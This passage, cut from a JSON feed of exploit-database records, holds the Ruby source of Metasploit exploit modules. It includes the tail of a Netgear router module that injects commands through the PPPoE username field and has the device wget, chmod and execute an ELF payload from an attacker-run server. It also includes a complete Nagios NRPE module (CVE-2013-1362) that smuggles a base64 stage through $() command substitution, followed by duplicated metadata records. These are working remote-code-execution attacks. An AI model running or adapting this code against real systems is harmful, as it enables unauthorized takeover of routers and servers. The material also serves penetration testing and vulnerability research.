})\n if res.nil? or res.code == 404\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}\")\n end\n if [200, 301, 302].include?(res.code)\n if res.body =~ /pppoe_username/\n print_good(\"#{rhost}:#{rport} - Successfully downloaded the configuration\")\n else\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Download of the original configuration not possible or the device uses a configuration which is not supported\")\n end\n else\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}\")\n end\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport} - Failed to connect to the web server\")\n end\n\n @pppoe_username_orig = get_config(res.body, \"<td\\ align=\\\"right\\\"><input\\ type=\\\"text\\\"\\ name=\\\"pppoe_username\\\"\\ size=\\\"15\\\"\\ maxlength=\\\"63\\\"\\ value=\\\"(.*)\\\"><\\/td\")\n @pppoe_passwd_orig = get_config(res.body, \"<td\\ align=\\\"right\\\"><input\\ type=\\\"password\\\"\\ name=\\\"pppoe_passwd\\\"\\ size=\\\"15\\\"\\ maxlength=\\\"63\\\"\\ value=\\\"(.*)\\\"><\\/td\")\n @pppoe_servicename_orig = get_config(res.body, \"<td\\ align=\\\"right\\\"><input\\ type=\\\"text\\\"\\ name=\\\"pppoe_servicename\\\"\\ maxlength=\\\"63\\\"\\ size=\\\"15\\\"\\ value=\\\"(.*)\\\"><\\/td\")\n\n @runtest_orig = get_config(res.body, \"<input\\ type=\\\"hidden\\\"\\ name=\\\"runtest\\\"\\ value=\\\"(.*)\\\">\")\n @wan_ipaddr_orig = get_config(res.body, \"<INPUT\\ name=wan_ipaddr\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @pppoe_localip_orig = get_config(res.body, \"<INPUT\\ name=pppoe_localip\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_dns_sel_orig = get_config(res.body, \"<INPUT\\ name=wan_dns_sel\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_dns1_pri_orig = get_config(res.body, \"<INPUT\\ name=wan_dns1_pri\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_dns1_sec_orig = get_config(res.body, \"<INPUT\\ name=wan_dns1_sec\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_hwaddr_sel_orig = get_config(res.body, \"<INPUT\\ name=wan_hwaddr_sel\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_hwaddr_def_orig = get_config(res.body, \"<INPUT\\ name=wan_hwaddr_def\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_hwaddr2_orig = get_config(res.body, \"<INPUT\\ name=wan_hwaddr2\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_hwaddr_pc_orig = get_config(res.body, \"<INPUT\\ name=wan_hwaddr_pc\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_nat_orig = get_config(res.body, \"<INPUT\\ name=wan_nat\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @opendns_parental_ctrl_orig = get_config(res.body, \"<INPUT\\ name=opendns_parental_ctrl\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @pppoe_flet_sel_orig = get_config(res.body, \"<INPUT\\ name=pppoe_flet_sel\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @pppoe_flet_type_orig = get_config(res.body, \"<INPUT\\ name=pppoe_flet_type\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @pppoe_temp_orig = get_config(res.body, \"<INPUT\\ name=pppoe_temp\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @apply_orig = get_config(res.body, \"<input\\ type=\\\"SUBMIT\\\"\\ name=\\\"apply\\\"\\ value=(.*)\\ onClick=\\\"return\\ checkData\\(\\)\\\">\")\n end\n\n def restore_conf(user,pass,uri)\n # we have used most parts of the original configuration\n # just need to restore pppoe_username\n cmd = @pppoe_username_orig\n print_status(\"#{rhost}:#{rport} - Asking the Netgear device to reload original configuration\")\n\n res = request(cmd,user,pass,uri)\n\n if (!res)\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Unable to reload original configuration\")\n end\n\n print_status(\"#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration\")\n select(nil, nil, nil, @timeout)\n end\n\n def request(cmd,user,pass,uri)\n begin\n\n #original post request\n #login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20COMMAND%20%26\n #&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5\n #&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen\n #&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0\n #&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0\n #&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05\n #&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0\n #&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0\n res = send_request_cgi(\n {\n 'uri'\t=> uri,\n 'method' => 'POST',\n 'authorization' => basic_auth(user,pass),\n 'encode_params' => false,\n 'vars_post' => {\n \"login_type\" => \"PPPoE%28PPP+over+Ethernet%29\",#default must be ok\n \"pppoe_username\" => cmd,\n \"pppoe_passwd\" => @pppoe_passwd_orig,\n \"pppoe_servicename\" => @pppoe_servicename_orig,\n \"pppoe_dod\" => \"1\",\t\t#default must be ok\n \"pppoe_idletime\" => \"5\",\t#default must be ok\n \"WANAssign\" => \"Dynamic\",\t#default must be ok\n \"DNSAssign\" => \"0\",\t\t#default must be ok\n \"en_nat\" => \"1\",\t\t#default must be ok\n \"MACAssign\" => \"0\",\t\t#default must be ok\n \"apply\" => @apply_orig,\n \"runtest\" => @runtest_orig,\n \"wan_ipaddr\" => @wan_ipaddr_orig,\n \"pppoe_localip\" => @pppoe_localip_orig,\n \"wan_dns_sel\" => @wan_dns_sel_orig,\n \"wan_dns1_pri\" => @wan_dns1_pri_orig,\n \"wan_dns1_sec\" => @wan_dns1_sec_orig,\n \"wan_hwaddr_sel\" => @wan_hwaddr_sel_orig,\n \"wan_hwaddr_def\" => @wan_hwaddr_def_orig,\n \"wan_hwaddr2\" => @wan_hwaddr2_orig,\n \"wan_hwaddr_pc\" => @wan_hwaddr_pc_orig,\n \"wan_nat\" => @wan_nat_orig,\n \"pppoe_flet_sel\" => @pppoe_flet_sel_orig,\n \"pppoe_flet_type\" => @pppoe_flet_type_orig,\n \"pppoe_temp\" => @pppoe_temp_orig,\n \"opendns_parental_ctrl\" => @opendns_parental_ctrl_orig\n }\n })\n return res\n rescue ::Rex::ConnectionError\n vprint_error(\"#{rhost}:#{rport} - Failed to connect to the web server\")\n return nil\n end\n end\n\n def logout(user,pass)\n begin\n res = send_request_cgi({\n 'uri' => '/LGO_logout.htm',\n 'method' => 'GET',\n 'authorization' => basic_auth(user,pass)\n })\n if res.nil? or res.code == 404\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - No successful logout possible\")\n end\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport} - Failed to connect to the web server\")\n end\n\n end\n\n def exploit\n downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))\n uri = '/pppoe.cgi'\n user = datastore['HttpUsername']\n pass = datastore['HttpPassword']\n @timeout = datastore['RELOAD_CONF_DELAY']\n\n #\n # testing Login\n #\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user} / #{pass}\")\n begin\n res = send_request_cgi({\n 'uri' => '/',\n 'method' => 'GET',\n 'authorization' => basic_auth(user,pass)\n })\n if res.nil? or res.code == 404\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}\")\n end\n if [200, 301, 302].include?(res.code)\n print_good(\"#{rhost}:#{rport} - Successful login #{user}/#{pass}\")\n else\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}\")\n end\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport} - Failed to connect to the web server\")\n end\n\n grab_config(user,pass)\n\n if target.name =~ /CMD/\n if not (datastore['CMD'])\n fail_with(Failure::BadConfig, \"#{rhost}:#{rport} - Only the cmd/generic payload is compatible\")\n end\n cmd = payload.encoded\n cmd = \"%26%20#{cmd}%20%26\"\n res = request(cmd,user,pass,uri)\n if (!res)\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\n else\n print_status(\"#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\")\n end\n return\n end\n\n #thx to Juan for his awesome work on the mipsel elf support\n @pl = generate_payload_exe\n @elf_sent = false\n\n #\n # start our server\n #\n resource_uri = '/' + downfile\n\n if (datastore['DOWNHOST'])\n service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri\n else\n #do not use SSL\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n #we use SRVHOST as download IP for the coming wget command.\n #SRVHOST needs a real IP address of our download host\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n\n datastore['SSL'] = true if ssl_restore\n end\n\n #\n # download payload\n #\n print_status(\"#{rhost}:#{rport} - Asking the Netgear device to download and execute #{service_url}\")\n #this filename is used to store the payload on the device\n filename = rand_text_alpha_lower(8)\n\n cmd = \"/usr/bin/wget #{service_url} -O /tmp/#{filename};chmod 777 /tmp/#{filename};/tmp/#{filename}\"\n cmd = Rex::Text.uri_encode(cmd)\n cmd = \"%26%20#{cmd}%20%26\"\n res = request(cmd,user,pass,uri)\n if (!res)\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Unable to deploy payload\")\n end\n\n # wait for payload download\n if (datastore['DOWNHOST'])\n print_status(\"#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Netgear device to download the payload\")\n select(nil, nil, nil, datastore['HTTP_DELAY'])\n else\n wait_linux_payload\n end\n register_file_for_cleanup(\"/tmp/#{filename}\")\n\n #\n #reload original configuration\n #\n restore_conf(user,pass,uri)\n\n #\n #lockout of the device and free the management sessions\n #\n logout(user,pass)\n end\n\n # Handle incoming requests from the server\n def on_request_uri(cli, request)\n #print_status(\"on_request_uri called: #{request.inspect}\")\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @elf_sent = true\n send_response(cli, @pl)\n end\n\n # wait for the data to be sent\n def wait_linux_payload\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...\")\n\n waited = 0\n while (not @elf_sent)\n select(nil, nil, nil, 1)\n waited += 1\n if (waited > datastore['HTTP_DELAY'])\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\")\n end\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-29T10:52:05", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 106}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-07-29T13:09:56", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-07-29T13:09:56"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310850457", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:850460", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-07-29T13:09:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-29T13:09:56", "differentElements": ["sourceData"], "edition": 107}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "7af0909609ddf9c8e970b9a830af05bd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-08-02T15:00:56", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2019-08-02T15:00:56"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121287", "PACKETSTORM:120507"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "nessus", "idList": ["FEDORA_2013-9848.NASL", "FEDORA_2013-9829.NASL", "FEDORA_2013-9836.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "OPENSUSE-2013-301.NASL", "NAGIOS_NRPE_2_14.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865802", "OPENVAS:1361412562310865802", "OPENVAS:850460", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310121262"]}, {"type": "saint", "idList": ["SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-08-02T15:00:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-02T15:00:56", "differentElements": ["sourceData"], "edition": 108}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-08-02T16:54:26", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-08-02T16:54:26"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "NAGIOS_NRPE_2_14.NASL", "ALA_ALAS-2013-203.NASL", "OPENSUSE-2013-301.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865802", "OPENVAS:1361412562310850457", "OPENVAS:865756", "OPENVAS:850460", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310121262"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-08-02T16:54:26"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which